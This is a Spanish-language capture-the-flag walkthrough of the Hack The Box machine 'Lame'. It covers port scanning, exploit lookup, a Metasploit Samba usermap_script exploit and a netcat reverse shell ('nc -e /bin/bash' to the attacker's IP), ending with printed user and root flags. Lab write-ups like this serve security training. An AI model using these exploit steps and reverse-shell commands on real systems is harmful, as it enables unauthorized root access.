Lame
4 minutos de lectura
- SO: Linux
- Dificultad: Fácil
- Dirección IP: 10.10.10.3
- Fecha: 14 / 03 / 2017
Escaneo de puertos
# Nmap 7.92 scan initiate as: nmap -sC -sV -Pn -o nmap/targeted 10.10.10.3 -p 21,22,139,445,3632
Nmap scan report for 10.10.10.3
Host is up (0.064s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.17.44
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time:
|_clock-skew: mean: 2h01m21s, deviation: 2h49m45s, median: 1m18s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 52.51 seconds
La máquina tiene abiertos los puertos 21 (FTP), 22 (SSH), 139, 445 (SMB) y 3632.
Enumeración por FTP
Como dice nmap
podemos acceder por FTP con credenciales anonymous
:
$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:rocky): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
Pero no hay nada dentro.
Podemos buscar exploits para la versión del servicio FTP (vsFTP 2.3.4) con searchsploit
:
$ searchsploit vsftp 2.3.4
------------------------------------------------------- ----------------------
Exploit Title | Path
------------------------------------------------------- ----------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
------------------------------------------------------- ----------------------
Shellcodes: No Results
Vale, parece que podemos obtener ejecución remota de comandos (RCE) para esta versión (CVE-2011-2523). Si inspeccionamos el código fuente del exploit, parece que hay una puerta trasera (backdoor) para el usuario nergal:)
que abre una shell en el puerto 6200. No obstante, no es explotable.
Enumeración por SMB
Vamos a buscar exploit para Samba 3.0.20 en searchsploit
:
$ searchsploit Samba 3.0.20
--------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
-------------------------------------------------------------------------------------------------------------------
Shellcodes: No Results
Genial, hay uno que nos da RCE.
Intrusión en la máquina
Vamos a utilizar Metasploit para esto:
# msfconsole -q
msf6 > search Samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.100 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.17.44
LHOST => 10.10.17.44
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.17.44:4444
[*] Command shell session 1 opened (10.10.17.44:4444 -> 10.10.10.3:40626) at 2022-07-17 18:24:10 +0200
which nc
/bin/nc
nc -e /bin/bash 10.10.17.44 5555
Decidí utilizar una segunda reverse shell para obtener una TTY completa en nc
:
$ nc -nlvp 5555
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:54564.
script /dev/null -c bash
root@lame:/# ^Z
zsh: suspended ncat -nlvp 5555
$ stty raw -echo; fg
[1] + continued ncat -nlvp 5555
Erase set to delete.
Kill set to control-U (^U).
Interrupt set to control-C (^C).
root@lame:/# export TERM=xterm
root@lame:/# export SHELL=bash
root@lame:/# stty rows 50 columns 158
Escalada de privilegios
Ya somos root
, por lo que solamente tenemos que capturar las flags:
root@lame:/# ls /home
ftp makis service user
root@lame:/# find /home -name user.txt
/home/makis/user.txt
root@lame:/# cat /home/makis/user.txt
56c5a638db443c0dd212990228c55aec
root@lame:/# cat /root/root.txt
490c7ed2a8c6e7a72d719d478938accc